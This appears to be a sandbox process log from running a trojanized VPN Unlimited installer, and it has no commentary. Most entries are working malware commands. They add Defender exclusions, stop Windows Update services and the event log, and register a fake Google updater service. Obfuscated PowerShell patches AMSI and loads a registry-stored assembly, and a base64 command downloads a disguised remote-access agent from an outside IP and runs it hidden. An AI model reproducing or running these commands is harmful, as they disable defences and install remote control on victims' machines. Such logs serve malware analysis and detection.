"C:\Users\Admin\AppData\Local\Temp\VPN_Unlimited_v9.3.2_64.exe"
C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp
"C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp" /SL5="$D006A,103859173,936960,C:\Users\Admin\AppData\Local\Temp\VPN_Unlimited_v9.3.2_64.exe"
C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe
"C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe" -Duser.language=en -Duser.country=US -Dfile.encoding=UTF-8 -classpath "lib\.;lib\..;lib\asm-all.jar;lib\dn-compiled-module.jar;lib\dn-php-sdk.jar;lib\gson.jar;lib\jphp-app-framework.jar;lib\jphp-core.jar;lib\jphp-desktop-ext.jar;lib\jphp-gui-ext.jar;lib\jphp-json-ext.jar;lib\jphp-runtime.jar;lib\jphp-xml-ext.jar;lib\jphp-zend-ext.jar;lib\jphp-zip-ext.jar;lib\slf4j-api.jar;lib\slf4j-simple.jar;lib\zt-zip.jar" org.develnext.jphp.ext.javafx.FXLauncher
C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 65001>nul & C:\Windows\SysNative\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v "CurrentBuild""
C:\Windows\SysWOW64\chcp.com
C:\Windows\System32\chcp.com 65001
C:\Windows\system32\reg.exe
C:\Windows\SysNative\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v "CurrentBuild"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe CPU get Name /Format:List | C:\Windows\System32\more.com"
C:\Windows\SysWOW64\chcp.com
C:\Windows\System32\chcp.com 866
C:\Windows\SysWOW64\wbem\WMIC.exe
C:\Windows\System32\wbem\wmic.exe CPU get Name /Format:List
C:\Windows\SysWOW64\more.com
C:\Windows\System32\more.com
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe Path Win32_VideoController Get AdapterCompatibility /Format:List | C:\Windows\System32\more.com"
C:\Windows\SysWOW64\chcp.com
C:\Windows\System32\chcp.com 866
C:\Windows\SysWOW64\wbem\WMIC.exe
C:\Windows\System32\wbem\wmic.exe Path Win32_VideoController Get AdapterCompatibility /Format:List
C:\Windows\SysWOW64\more.com
C:\Windows\System32\more.com
C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe path Win32_ComputerSystem get TotalPhysicalMemory /Format:List | C:\Windows\System32\more.com"
C:\Windows\SysWOW64\chcp.com
C:\Windows\System32\chcp.com 866
C:\Windows\SysWOW64\wbem\WMIC.exe
C:\Windows\System32\wbem\wmic.exe path Win32_ComputerSystem get TotalPhysicalMemory /Format:List
C:\Windows\SysWOW64\more.com
C:\Windows\System32\more.com
C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 65001>nul & C:\Windows\SysNative\reg.exe query "HKU\S-1-5-19""
C:\Windows\SysWOW64\chcp.com
C:\Windows\System32\chcp.com 65001
C:\Windows\system32\reg.exe
C:\Windows\SysNative\reg.exe query "HKU\S-1-5-19"
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:mtQwSmGwLEWJ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$fsfIBvYcgaOAvy,[Parameter(Position=1)][Type]$ZYBMOcghmC)$vcdXabiKTOh=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+'e'+''+[Char](102)+''+'l'+''+'e'+''+[Char](99)+''+'t'+'e'+'d'+''+[Char](68)+'e'+'l'+''+[Char](101)+''+'g'+''+'a'+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('In'+[Char](77)+'e'+[Char](109)+''+[Char](111)+''+[Char](114)+''+'y'+''+[Char](77)+''+[Char](111)+'d'+[Char](117)+'l'+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+''+'D'+''+[Char](101)+''+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+'y'+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+',P'+[Char](117)+'bli'+'c'+''+[Char](44)+'Sea'+'l'+''+[Char](101)+'d,'+[Char](65)+'n'+[Char](115)+''+[Char](105)+''+'C'+''+'l'+''+[Char](97)+''+[Char](115)+'s,'+[Char](65)+'u'+[Char](116)+''+[Char](111)+'Clas'+[Char](115)+'',[MulticastDelegate]);$vcdXabiKTOh.DefineConstructor('R'+'T'+'S'+[Char](112)+'e'+'c'+''+[Char](105)+''+[Char](97)+''+'l'+'N'+[Char](97)+''+[Char](109)+'e'+[Char](44)+''+[Char](72)+''+[Char](105)+''+'d'+'e'+'B'+''+[Char](121)+''+'S'+'ig'+[Char](44)+''+[Char](80)+'ub'+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$fsfIBvYcgaOAvy).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'nt'+[Char](105)+'m'+[Char](101)+','+[Char](77)+'a'+[Char](110)+''+[Char](97)+'g'+[Char](101)+'d');$vcdXabiKTOh.DefineMethod(''+[Char](73)+''+[Char](110)+''+'v'+''+'o'+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+','+[Char](72)+''+[Char](105)+''+'d'+'e'+[Char](66)+''+'y'+'S'+'i'+''+[Char](103)+',N'+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+'o'+'t'+''+[Char](44)+'V'+'i'+''+[Char](114)+'t'+'u'+'a'+'l'+'',$ZYBMOcghmC,$fsfIBvYcgaOAvy).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+'t'+[Char](105)+'m'+'e'+''+[Char](44)+''+'M'+'a'+[Char](110)+''+[Char](97)+''+'g'+''+'e'+''+'d'+'');Write-Output $vcdXabiKTOh.CreateType();}$bysCbyVaaHGQl=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+'s'+''+'t'+'e'+'m'+'.d'+[Char](108)+'l')}).GetType(''+[Char](77)+''+'i'+''+'c'+''+[Char](114)+''+'o'+''+'s'+''+[Char](111)+''+'f'+''+[Char](116)+''+[Char](46)+'W'+[Char](105)+''+[Char](110)+'32'+'.'+'U'+[Char](110)+'sa'+[Char](102)+''+[Char](101)+'N'+[Char](97)+'t'+[Char](105)+'v'+[Char](101)+'M'+'e'+''+'t'+''+'h'+'od'+'s'+'');$rcTDfBNaBDyzap=$bysCbyVaaHGQl.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+'P'+[Char](114)+''+[Char](111)+''+[Char](99)+'Ad'+'d'+'r'+[Char](101)+''+[Char](115)+'s',[Reflection.BindingFlags](''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+[Char](83)+'t'+'a'+''+[Char](116)+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$raEqzODfeTGmDTffnMm=mtQwSmGwLEWJ @([String])([IntPtr]);$hnYwppMPHReuIAcMBHSEGP=mtQwSmGwLEWJ @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$apkUFxnfScg=$bysCbyVaaHGQl.GetMethod(''+'G'+''+'e'+''+[Char](116)+''+[Char](77)+''+'o'+''+[Char](100)+''+[Char](117)+''+'l'+''+'e'+'Ha'+[Char](110)+''+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object]('k'+[Char](101)+'rn'+[Char](101)+''+'l'+'32'+[Char](46)+''+[Char](100)+''+'l'+''+'l'+'')));$QqtYndOsnDuHYm=$rcTDfBNaBDyzap.Invoke($Null,@([Object]$apkUFxnfScg,[Object](''+[Char](76)+'o'+[Char](97)+''+'d'+'Li'+[Char](98)+''+'r'+'ary'+[Char](65)+'')));$IadeBVEVDFlqepUqQ=$rcTDfBNaBDyzap.Invoke($Null,@([Object]$apkUFxnfScg,[Object](''+'V'+''+[Char](105)+''+'r'+'t'+[Char](117)+''+'a'+''+[Char](108)+''+'P'+''+[Char](114)+''+[Char](111)+''+'t'+''+[Char](101)+''+'c'+''+'t'+'')));$gjBVOhO=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($QqtYndOsnDuHYm,$raEqzODfeTGmDTffnMm).Invoke(''+[Char](97)+''+[Char](109)+''+'s'+''+'i'+''+[Char](46)+'d'+'l'+''+'l'+'');$kWTEgfGxsUcdchRSg=$rcTDfBNaBDyzap.Invoke($Null,@([Object]$gjBVOhO,[Object](''+'A'+''+'m'+''+'s'+''+[Char](105)+'S'+'c'+''+[Char](97)+'n'+[Char](66)+''+[Char](117)+''+'f'+'f'+'e'+''+'r'+'')));$ZjbShkazuS=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IadeBVEVDFlqepUqQ,$hnYwppMPHReuIAcMBHSEGP).Invoke($kWTEgfGxsUcdchRSg,[uint32]8,4,[ref]$ZjbShkazuS);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$kWTEgfGxsUcdchRSg,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IadeBVEVDFlqepUqQ,$hnYwppMPHReuIAcMBHSEGP).Invoke($kWTEgfGxsUcdchRSg,[uint32]8,0x20,[ref]$ZjbShkazuS);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+''+[Char](70)+'T'+'W'+''+[Char](65)+''+'R'+''+[Char](69)+'').GetValue(''+'d'+''+'i'+''+'a'+''+[Char](108)+'e'+[Char](114)+'s'+[Char](116)+'a'+[Char](103)+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
C:\ProgramData\Google\Chrome\updater.exe
C:\ProgramData\Google\Chrome\updater.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
dialer.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {$script = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRm9yY2UgLUV4Y2x1c2lvblBhdGggIkM6XCI=')); Invoke-Expression $script}"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {$script = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JHVybCA9ICJodHRwOi8vNDYuOC4yMjcuMTYvdXBsb2Fkcy9tZXNoYWdlbnQzMi1tZXNoLnBuZyIKCiRvdXRwdXQgPSAiJGVudjpURU1QXG1lc2hhZ2VudDMyLW1lc2guZXhlIgoKSW52b2tlLVdlYlJlcXVlc3QgLVVyaSAkdXJsIC1PdXRGaWxlICRvdXRwdXQKCmlmIChUZXN0LVBhdGggJG91dHB1dCkgewogICAgdHJ5IHsKICAgICAgICAkcHJvY2Vzc1N0YXJ0ID0gTmV3LU9iamVjdCBTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2Vzc1N0YXJ0SW5mbwogICAgICAgICRwcm9jZXNzU3RhcnQuRmlsZU5hbWUgPSAkb3V0cHV0CiAgICAgICAgJHByb2Nlc3NTdGFydC5Bcmd1bWVudHMgPSAiLWZ1bGxpbnN0YWxsIgogICAgICAgICRwcm9jZXNzU3RhcnQuV2luZG93U3R5bGUgPSBbU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3NXaW5kb3dTdHlsZV06OkhpZGRlbgogICAgICAgIFtTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2Vzc106OlN0YXJ0KCRwcm9jZXNzU3RhcnQpCiAgICB9CiAgICBjYXRjaCB7CiAgICB9Cn0KZWxzZSB7CiAKfQ==')); Invoke-Expression $script}"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:KSZCfUBdvTiQ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$KPyEjDOmvfQaoM,[Parameter(Position=1)][Type]$YtLWbYXVey)$CvDbKunIymc=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+[Char](108)+''+[Char](101)+'c'+[Char](116)+''+[Char](101)+'d'+'D'+'el'+'e'+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+[Char](77)+'e'+'m'+''+'o'+''+[Char](114)+''+'y'+''+[Char](77)+''+[Char](111)+'d'+'u'+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+'D'+'e'+'l'+''+[Char](101)+''+[Char](103)+''+'a'+''+'t'+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+'C'+'l'+[Char](97)+''+'s'+''+[Char](115)+','+[Char](80)+''+'u'+''+'b'+''+'l'+'i'+'c'+''+[Char](44)+''+'S'+'e'+[Char](97)+''+'l'+'e'+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+'Cl'+[Char](97)+''+[Char](115)+''+'s'+','+[Char](65)+'u'+'t'+''+[Char](111)+'C'+[Char](108)+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$CvDbKunIymc.DefineConstructor(''+[Char](82)+'T'+[Char](83)+''+'p'+''+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+'a'+'me,'+[Char](72)+''+'i'+''+'d'+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+'S'+'i'+[Char](103)+''+[Char](44)+''+[Char](80)+'u'+'b'+''+[Char](108)+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$KPyEjDOmvfQaoM).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+'e'+[Char](44)+''+[Char](77)+''+[Char](97)+'na'+[Char](103)+''+'e'+''+[Char](100)+'');$CvDbKunIymc.DefineMethod('I'+'n'+''+'v'+''+'o'+''+[Char](107)+''+'e'+'','P'+'u'+''+[Char](98)+'l'+[Char](105)+'c'+','+''+[Char](72)+''+[Char](105)+''+'d'+'e'+[Char](66)+'y'+[Char](83)+''+[Char](105)+'g,'+[Char](78)+''+'e'+''+'w'+''+'S'+''+[Char](108)+'ot'+[Char](44)+''+[Char](86)+''+'i'+''+[Char](114)+''+'t'+''+[Char](117)+'a'+[Char](108)+'',$YtLWbYXVey,$KPyEjDOmvfQaoM).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+'t'+''+[Char](105)+'m'+[Char](101)+''+[Char](44)+'Man'+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');Write-Output $CvDbKunIymc.CreateType();}$kBRboUerECnnW=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+'t'+[Char](101)+''+[Char](109)+'.'+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+'c'+[Char](114)+''+[Char](111)+''+[Char](115)+'o'+'f'+'t.'+[Char](87)+'i'+[Char](110)+''+[Char](51)+''+[Char](50)+''+[Char](46)+'U'+'n'+'s'+[Char](97)+''+[Char](102)+'e'+[Char](78)+''+'a'+''+'t'+''+[Char](105)+''+'v'+'e'+'M'+''+[Char](101)+''+[Char](116)+'ho'+[Char](100)+''+[Char](115)+'');$GGOhUJUTAVLAqf=$kBRboUerECnnW.GetMethod(''+[Char](71)+'etP'+[Char](114)+''+[Char](111)+''+'c'+''+[Char](65)+''+'d'+'d'+'r'+''+'e'+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags]('Pub'+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+'a'+'t'+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$GNMrKDkpUmfeiAUPKHV=KSZCfUBdvTiQ @([String])([IntPtr]);$ynKQXYtJrQdVJpLWDhGlvP=KSZCfUBdvTiQ @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$ZuRAyhUhvGV=$kBRboUerECnnW.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+[Char](111)+'d'+[Char](117)+''+'l'+'e'+[Char](72)+''+[Char](97)+''+[Char](110)+''+[Char](100)+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+'e'+''+[Char](114)+'n'+[Char](101)+'l'+[Char](51)+'2'+[Char](46)+''+[Char](100)+''+'l'+'l')));$iKjqgaOjJMphOi=$GGOhUJUTAVLAqf.Invoke($Null,@([Object]$ZuRAyhUhvGV,[Object]('Loa'+[Char](100)+'L'+[Char](105)+''+[Char](98)+''+[Char](114)+''+[Char](97)+'r'+[Char](121)+''+[Char](65)+'')));$GHIyBMoysFkwRkMYk=$GGOhUJUTAVLAqf.Invoke($Null,@([Object]$ZuRAyhUhvGV,[Object](''+[Char](86)+''+'i'+''+[Char](114)+''+[Char](116)+''+[Char](117)+'alP'+[Char](114)+'o'+[Char](116)+'ec'+[Char](116)+'')));$ZePfiUK=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($iKjqgaOjJMphOi,$GNMrKDkpUmfeiAUPKHV).Invoke('a'+'m'+''+'s'+''+[Char](105)+''+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'');$iQewOCddMYkynLFMd=$GGOhUJUTAVLAqf.Invoke($Null,@([Object]$ZePfiUK,[Object](''+[Char](65)+'m'+[Char](115)+''+'i'+'Sc'+[Char](97)+''+[Char](110)+'B'+[Char](117)+''+'f'+''+[Char](102)+''+[Char](101)+'r')));$BPWDLsLRaq=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GHIyBMoysFkwRkMYk,$ynKQXYtJrQdVJpLWDhGlvP).Invoke($iQewOCddMYkynLFMd,[uint32]8,4,[ref]$BPWDLsLRaq);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$iQewOCddMYkynLFMd,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GHIyBMoysFkwRkMYk,$ynKQXYtJrQdVJpLWDhGlvP).Invoke($iQewOCddMYkynLFMd,[uint32]8,0x20,[ref]$BPWDLsLRaq);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+[Char](84)+'W'+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](100)+''+[Char](105)+'ale'+'r'+''+'s'+''+[Char](116)+''+[Char](97)+''+[Char](103)+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
"cmd" /c "taskkill /IM WireVPNUImpl.exe /F"
C:\Windows\SysWOW64\taskkill.exe
taskkill /IM WireVPNUImpl.exe /F
C:\Windows\SysWOW64\cmd.exe
"cmd" /c "taskkill /IM vpn-unlimited.exe /F"
C:\Windows\SysWOW64\taskkill.exe
taskkill /IM vpn-unlimited.exe /F
C:\Windows\SysWOW64\cmd.exe
"cmd" /c "taskkill /IM vpn-unlimited-launcher.exe /F"
C:\Windows\SysWOW64\taskkill.exe
taskkill /IM vpn-unlimited-launcher.exe /F
C:\Users\Admin\AppData\Local\Temp\4dab861c5f15add1529fa378ceef1272
C:\Users\Admin\AppData\Local\Temp\4dab861c5f15add1529fa378ceef1272
C:\Windows\SysWOW64\cmd.exe
"cmd" /c "taskkill /IM vpn-unlimited-daemon.exe /F"
C:\Windows\SysWOW64\taskkill.exe
taskkill /IM vpn-unlimited-daemon.exe /F
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {$script = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRm9yY2UgLUV4Y2x1c2lvblBhdGggIkM6XCI=')); Invoke-Expression $script}"
C:\Users\Admin\AppData\Local\Temp\is-GGC0A.tmp\VC_redist.x64.exe
"C:\Users\Admin\AppData\Local\Temp\is-GGC0A.tmp\VC_redist.x64.exe" /install /quiet /norestart
C:\Windows\Temp\{11C4A562-1DF9-45BB-84ED-B8E86757493D}\.cr\VC_redist.x64.exe
"C:\Windows\Temp\{11C4A562-1DF9-45BB-84ED-B8E86757493D}\.cr\VC_redist.x64.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\is-GGC0A.tmp\VC_redist.x64.exe" -burn.filehandle.attached=572 -burn.filehandle.self=548 /install /quiet /norestart
C:\Windows\Temp\{8104DCFE-FB5A-4688-88BC-0BDB39ADB238}\.be\VC_redist.x64.exe
"C:\Windows\Temp\{8104DCFE-FB5A-4688-88BC-0BDB39ADB238}\.be\VC_redist.x64.exe" -q -burn.elevated BurnPipe.{D33D7289-7B34-412F-BF37-11D305619EB5} {E09DFD33-2A60-46BA-879F-7FF1CEC34002} 2132
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F32D97DF-E3E5-4CB9-9E3E-0EB5B4E49801}
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k swprv
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc
C:\Windows\system32\srtasks.exe
C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{bf0b3ba3-b18f-4a55-98f6-da53ecb95817}
C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe
"C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe" -uninstall -quiet -burn.related.upgrade -burn.ancestors={8bdfe669-9705-4184-9368-db9ce581e0e7} -burn.filehandle.self=908 -burn.embedded BurnPipe.{E211567A-3290-4003-80F1-31256CECB22E} {B102515E-A50C-4BD3-B09D-110C098369B3} 1624
C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe
"C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe" -burn.clean.room="C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe" -burn.filehandle.attached=544 -burn.filehandle.self=560 -uninstall -quiet -burn.related.upgrade -burn.ancestors={8bdfe669-9705-4184-9368-db9ce581e0e7} -burn.filehandle.self=908 -burn.embedded BurnPipe.{E211567A-3290-4003-80F1-31256CECB22E} {B102515E-A50C-4BD3-B09D-110C098369B3} 1624
C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe
"C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe" -q -burn.elevated BurnPipe.{8DA2BC5D-B172-4525-ACC1-EB02D1B9A740} {EEC559E1-FB07-4135-896C-2537E38DAEBE} 768
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\is-GGC0A.tmp\firewall_exception.bat" "C:\Program Files (x86)\VPN Unlimited\vpn-unlimited.exe" "C:\Program Files (x86)\VPN Unlimited\openvpn.exe""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files (x86)\VPN Unlimited\vpn-unlimited-daemon.exe
"C:\Program Files (x86)\VPN Unlimited\vpn-unlimited-daemon.exe" -install
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall delete rule name="VPN Unlimited"
C:\Program Files (x86)\VPN Unlimited\vpn-unlimited-daemon.exe
"C:\Program Files (x86)\VPN Unlimited\vpn-unlimited-daemon.exe" -start
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files (x86)\VPN Unlimited\vpn-unlimited-daemon.exe
"C:\Program Files (x86)\VPN Unlimited\vpn-unlimited-daemon.exe"
C:\Windows\SysWOW64\msiexec.exe
"msiexec.exe" /uninstall "C:\Users\Admin\AppData\Local\Temp\is-GGC0A.tmp\TunSetupVPNU.msi" /quiet
C:\Windows\SysWOW64\sc.exe
"C:\Windows\system32\sc.exe" create VPNUSplitTunnel type= kernel binPath= "C:\Program Files (x86)\VPN Unlimited\VpnuDriver\VpnuDriver.sys"
C:\Program Files (x86)\VPN Unlimited\vpnu-push.exe
